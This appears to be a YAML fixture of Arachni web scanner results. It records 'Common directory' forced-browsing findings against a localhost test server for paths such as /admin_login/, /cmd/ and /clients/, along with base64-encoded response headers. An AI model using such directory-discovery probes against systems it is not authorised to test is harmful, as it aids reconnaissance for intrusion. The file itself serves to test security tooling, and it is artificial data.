!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/send/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/send/
injected: send
id: send
elem: path
remarks: {}
method: ''
response: send
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/details/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/details/
injected: details
id: details
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: details
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/examples/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/examples/
injected: examples
id: examples
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: examples
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/settings/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/settings/
injected: settings
id: settings
elem: path
remarks: {}
method: ''
response: settings
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/feedback/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/feedback/
injected: feedback
id: feedback
elem: path
remarks: {}
method: ''
response: feedback
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/global/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/global/
injected: global
id: global
elem: path
remarks: {}
method: ''
response: global
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/globals/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/globals/
injected: globals
id: globals
elem: path
remarks: {}
method: ''
response: globals
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/guestbook/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/guestbook/
injected: guestbook
id: guestbook
elem: path
remarks: {}
method: ''
response: guestbook
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/admin_/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/admin_/
injected: admin_
id: admin_
elem: path
remarks: {}
method: ''
response: admin_
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/admin_login/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/admin_login/
injected: admin_login
id: admin_login
elem: path
remarks: {}
method: ''
response: admin_login
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/admin_logon/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/admin_logon/
injected: admin_logon
id: admin_logon
elem: path
remarks: {}
method: ''
response: admin_logon
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/adminlogon/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/adminlogon/
injected: adminlogon
id: adminlogon
elem: path
remarks: {}
method: ''
response: adminlogon
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/client/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/client/
injected: client
id: client
elem: path
remarks: {}
method: ''
response: client
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/clients/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/clients/
injected: clients
id: clients
elem: path
remarks: {}
method: ''
response: clients
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/cmd/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/cmd/
injected: cmd
id: cmd
elem: path
remarks: {}
method: ''
response: cmd
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
